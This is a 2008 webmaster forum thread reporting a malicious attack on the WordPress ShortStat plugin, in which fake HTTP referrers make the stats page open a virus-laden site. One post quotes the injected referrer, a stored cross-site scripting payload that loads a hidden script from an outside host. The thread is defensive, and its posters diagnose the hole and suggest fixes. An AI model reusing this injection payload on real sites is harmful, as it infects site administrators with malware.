Go Back   Netpond ™ > Webmaster Forums and Resources > Blogging Forum
Register FAQ Calendar Radio and TV NP Shop Search Today's Posts Mark Forums Read

Blogging Forum Blogging Discussion Forum, links and tools.

EvilAngelCash
ETU-Cash ETU-Cash
Reply
 
LinkBack Thread Tools Display Modes
Old 05-08-2008, 02:48 PM   #1 (permalink)
rogue
Warriors ... Come out to play!
 
rogue's Avatar
 
Join Date: Oct 2004
Location: Great Britain
Posts: 16,839
Points: 3,130
Send a message via ICQ to rogue Send a message via MSN to rogue
Exclamation VERY IMPORTANT!! Read in if you use shortstats

Yet again some russian scum bag is trying to fuck your computer over, he is getting his website to appear in your stats and somehow if you check your stats using shortstats it will automatically launch his site filled to the brim with viruses.
guess who his major sponsor is? AFF! Suprised?
rogue is offline   Reply With Quote Send a private message to rogue
Old 05-09-2008, 08:01 AM   #2 (permalink)
rogue
Warriors ... Come out to play!
 
rogue's Avatar
 
Join Date: Oct 2004
Location: Great Britain
Posts: 16,839
Points: 3,130
Send a message via ICQ to rogue Send a message via MSN to rogue
its been reported by others now, so bumpy bump bump
rogue is offline   Reply With Quote Send a private message to rogue
Old 05-09-2008, 08:13 AM   #3 (permalink)
JaceXXX
www.thatblogguy.com
 
Join Date: Jan 2004
Location: icq: 102893553
Posts: 991
Points: 1,735
Send a message via ICQ to JaceXXX
any ideas how he is getting in?
__________________

Contact me for all your blogs needs (installs, affiliate blogs, etc)
jace@thatblogguy.com
JaceXXX is offline   Reply With Quote Send a private message to JaceXXX
Old 05-09-2008, 08:29 AM   #4 (permalink)
JaceXXX
www.thatblogguy.com
 
Join Date: Jan 2004
Location: icq: 102893553
Posts: 991
Points: 1,735
Send a message via ICQ to JaceXXX
I just disabled and deleted it, and made a post on my blog about it, maybe we will see someone helping soon, i know a LOT of people use that plugin and it is a pretty standard part of my blog installs
If you run ShortStat, disable it NOW | JustJace.com
__________________

Contact me for all your blogs needs (installs, affiliate blogs, etc)
jace@thatblogguy.com
JaceXXX is offline   Reply With Quote Send a private message to JaceXXX
Old 05-09-2008, 08:49 AM   #5 (permalink)
rogue
Warriors ... Come out to play!
 
rogue's Avatar
 
Join Date: Oct 2004
Location: Great Britain
Posts: 16,839
Points: 3,130
Send a message via ICQ to rogue Send a message via MSN to rogue
Quote:
Originally Posted by JaceXXX View Post
any ideas how he is getting in?
i believe that he is sending fake hits so that his site apears on the referral list and using an exploit to open his site up when shortstats is read. trouble is, the dammed virus page appears before i can get a chance to check the stats page properly. i'm just disabling my shortstats untill "hopefully" a nvew version comes out
rogue is offline   Reply With Quote Send a private message to rogue
Old 05-09-2008, 09:00 AM   #6 (permalink)
JaceXXX
www.thatblogguy.com
 
Join Date: Jan 2004
Location: icq: 102893553
Posts: 991
Points: 1,735
Send a message via ICQ to JaceXXX
ok, i figured it out

i went into my database and he is sending a fake referrer with this as the url

Code:
http://a"></a>what>we<****** src=http://peewee.6x.to style=display:none></******><won.com
Just open up phpmyadmin and do a search for "******" in the wp_ss_stats table

and I would suggest coding something into the wp-shortstat.php to not allow the term "******" to be used in referrers. I have my programmer working on it now, will post when he is done
__________________

Contact me for all your blogs needs (installs, affiliate blogs, etc)
jace@thatblogguy.com
JaceXXX is offline   Reply With Quote Send a private message to JaceXXX
Old 05-09-2008, 01:12 PM   #7 (permalink)
kaktusan
Kaktusan Corp taking over the Coding biz
 
kaktusan's Avatar
 
Join Date: May 2004
Location: Bulgaria
Posts: 4,303
Points: 445
Send a message via ICQ to kaktusan Send a message via AIM to kaktusan
nowadays most shit is oriented to affecting webmasters and especially wordpress and its plugins since it is heavily used and open sourced. you guys should be careful when installing such free plugins from unverified sources!
__________________


#1 Mass Blogging Script: Blogs Organizer | #1 Mass RSS Feeder Script Blogs Automater
#1 Multidomain Hardlink Trade Script : Links Organizer | #1 Blog Posts Builder Script: Gallery Scraper
Complete List of Affiliate RSS Feeds! | A-B-C Blog Linktrades
kaktusan is offline   Reply With Quote Send a private message to kaktusan
Old 05-09-2008, 01:18 PM   #8 (permalink)
JaceXXX
www.thatblogguy.com
 
Join Date: Jan 2004
Location: icq: 102893553
Posts: 991
Points: 1,735
Send a message via ICQ to JaceXXX
Quote:
Originally Posted by kaktusan View Post
nowadays most shit is oriented to affecting webmasters and especially wordpress and its plugins since it is heavily used and open sourced. you guys should be careful when installing such free plugins from unverified sources!
well, I won't install a plugin unless it is on the wordpress site, PERIOD

and this has been on the wordpress.org site for a while

if you can't find it on WordPress › WordPress Plugins then it shouldn't be installed
__________________

Contact me for all your blogs needs (installs, affiliate blogs, etc)
jace@thatblogguy.com
JaceXXX is offline   Reply With Quote Send a private message to JaceXXX
Old 05-09-2008, 01:22 PM   #9 (permalink)
kaktusan
Kaktusan Corp taking over the Coding biz
 
kaktusan's Avatar
 
Join Date: May 2004
Location: Bulgaria
Posts: 4,303
Points: 445
Send a message via ICQ to kaktusan Send a message via AIM to kaktusan
Quote:
Originally Posted by JaceXXX View Post
well, I won't install a plugin unless it is on the wordpress site, PERIOD

and this has been on the wordpress.org site for a while

if you can't find it on WordPress › WordPress Plugins then it shouldn't be installed
so it was approved one? damn...
__________________


#1 Mass Blogging Script: Blogs Organizer | #1 Mass RSS Feeder Script Blogs Automater
#1 Multidomain Hardlink Trade Script : Links Organizer | #1 Blog Posts Builder Script: Gallery Scraper
Complete List of Affiliate RSS Feeds! | A-B-C Blog Linktrades
kaktusan is offline   Reply With Quote Send a private message to kaktusan
Old 05-09-2008, 01:29 PM   #10 (permalink)
JaceXXX
www.thatblogguy.com
 
Join Date: Jan 2004
Location: icq: 102893553
Posts: 991
Points: 1,735
Send a message via ICQ to JaceXXX
Quote:
Originally Posted by kaktusan View Post
so it was approved one? damn...
yeah, but here is the thing, the way this guy did this is pretty tricky, and in all honesty I would have NEVER thought of something like that, so I do give him points for being creative, but I also take a point off to the programmer for not thinking of it, ahha

a simple strip code command could have stopped this before it even started

i have a feeling there are going to be a couple thousand angry webmaster in the next few days
__________________

Contact me for all your blogs needs (installs, affiliate blogs, etc)
jace@thatblogguy.com
JaceXXX is offline   Reply With Quote Send a private message to JaceXXX
Old 05-09-2008, 05:02 PM   #11 (permalink)
kaktusan
Kaktusan Corp taking over the Coding biz
 
kaktusan's Avatar
 
Join Date: May 2004
Location: Bulgaria
Posts: 4,303
Points: 445
Send a message via ICQ to kaktusan Send a message via AIM to kaktusan
oh, just for the record, i just was looking at my Blogs Organizer stats and i see url code you pasted from your database Jace. Glad nothing happens in my script. I now remembered i have seen that before about a week appearing from time to time in my stats. I knew someone is trying to spam with HTTP Referrals and didn't pay attention, coz its regularly nowadays..

Looks like he is getting the blog urls from some big blog directories, coz i have nothing WP related at my blogs..
__________________


#1 Mass Blogging Script: Blogs Organizer | #1 Mass RSS Feeder Script Blogs Automater
#1 Multidomain Hardlink Trade Script : Links Organizer | #1 Blog Posts Builder Script: Gallery Scraper
Complete List of Affiliate RSS Feeds! | A-B-C Blog Linktrades
kaktusan is offline   Reply With Quote Send a private message to kaktusan
Reply


Thread Tools
Display Modes



Netpond Resources
Resource Directory Tutorials & Articles Webmaster Tools Netpond News
 
Netpond Resources
LoveDollars SlickCash PussyCash SilverCash
Fetish Hits Cyberwurx Platinum Bucks YappoDollars
AEBN GroobyBucks FlashCa$h XMoney
Rabbits Reviews SMSMovies.net TrafficCashGold EvilAngelCash
Orgycash ETU CASH Webcams Cyberbit
EvilAngelCash 2 Lips Cash
All times are GMT -4. The time now is 06:39 AM.


Powered by vBulletin® Version 3.6.10
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
vBCredits v1.4 Copyright ©2007, PixelFX Studios